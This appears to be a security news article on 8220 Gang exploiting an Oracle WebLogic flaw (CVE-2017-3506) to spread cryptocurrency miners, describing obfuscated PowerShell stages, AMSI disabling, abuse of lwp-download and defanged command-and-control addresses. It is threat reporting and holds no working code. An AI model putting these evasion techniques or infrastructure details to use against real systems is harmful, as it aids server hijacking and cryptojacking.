8220 Gang Exploits Oracle WebLogic Flaw to Hijack Servers and Mine Cryptocurrencies

May 18, 2023Ravie LakshmananCryptocurrency / Server Security

Famous cryptojacking groups tracked as 8220 Gang has been seen weaponizing a six year old security flaw in Oracle WebLogic servers to ensnare vulnerable instances into a botnet and distribute cryptocurrency mining malware.

The flaw in question is CVE-2017-3506 (CVSS score: 7.4), which, if successfully exploited, could allow unauthenticated attackers to remotely execute arbitrary commands.

“This could allow attackers to gain unauthorized access to sensitive data or compromise the entire system,” Trend Micro researcher Sunil Bharti said in a report published this week.

8220 Gang, documented beforehand by Cisco Talos in late 2018, so named because of its original use of port 8220 for command-and-control (C2) network communications.

“8220 Gang identifies targets through scanning of misconfigured or vulnerable hosts on the public internet,” SentinelOne noted last year. “8220 Gang is known to use post-infection SSH brute force attacks for the purpose of lateral movement within compromised networks.”

Earlier this year, Sydig detailed attacks carried out by a “low-skilled” crimeware group between November 2022 and January 2023 that aimed to penetrate the vulnerable Oracle WebLogic and Apache web servers and spread cryptocurrency miners.

It has also been observed using a ready-made malware downloader known as PureCrypter as well as a crypter codenamed ScrubCrypt to hide miner payloads and avoid detection by security software.

In the most recent attack chain documented by Trend Micro, the Oracle WebLogic Server vulnerability was exploited to deliver PowerShell payloads, which were then used to create other PowerShell scripts that were obfuscated in memory.

This newly created PowerShell script disables the Windows Antimalware Scanning Interface (AMSI) detects and launches the Windows binary which then reaches the remote server to retrieve the “meticulously disguised” payload.

An intermediate DLL file, for its part, is configured to download cryptocurrency miners from one of three C2 servers – 179.43.155(.)202, work.letmaker(.)top, and su-94.letmaker(.)top – using the TCP port 9090, 9091, or 9092.

Trend Micro said the recent attacks also led to misuse of the so-called official Linux tool lwp download to store arbitrary files on the compromised host.

“lwp-download is a Linux utility that comes on a number of platforms by default, and 8220 Gang makes it part of the routine any malware can affect a number of services even if it’s reused more than once,” said Bharti.

“Given threat actors’ tendency to reuse tools for different campaigns and to abuse legitimate tools as part of their arsenal, an organization’s security team may be challenged to find other detection and blocking solutions to counter attacks that abuse these utilities.”